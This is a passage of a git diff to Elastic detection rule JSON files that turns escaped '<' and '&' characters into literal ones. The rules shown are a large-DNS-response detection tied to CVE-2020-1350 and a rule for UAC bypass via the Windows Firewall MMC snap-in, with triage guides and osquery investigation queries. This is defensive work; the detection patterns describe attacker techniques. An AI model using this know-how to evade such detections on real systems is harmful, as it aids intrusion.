This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "(event.dataset: network_traffic.dns or (event.category: (network or network_traffic) and destination.port: 53)) and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "(event.dataset: network_traffic.dns or (event.category: (network or network_traffic) and destination.port: 53)) and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json index 2fa35a97c97..96cf911a51f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json index f2c433f5f27..d0abde6defa 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json index 8bb417b3d20..0368ba7f888 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json index 691b7279715..fcc75c3caa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json index 21a3138177a..d189c3be476 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json index 93eeb437762..d55019ba177 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json 
@@ -54,7 +54,7 @@
 ],
 "risk_score": 73,
 "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json
index a4f7d4dc573..9ab5a86a75a 100644
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "UAC Bypass via Windows Firewall Snap-In Hijack",
- "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n",
 "references": [
 "https://github.com/AzAgarampur/byeintegrity-uac"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json
index 44b646dcb23..15d27d904e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "UAC Bypass via Windows Firewall Snap-In Hijack",
- "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n",
 "references": [
 "https://github.com/AzAgarampur/byeintegrity-uac"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json
index b51c082e532..2d761b508db 100644
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "UAC Bypass via Windows Firewall Snap-In Hijack",
- "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 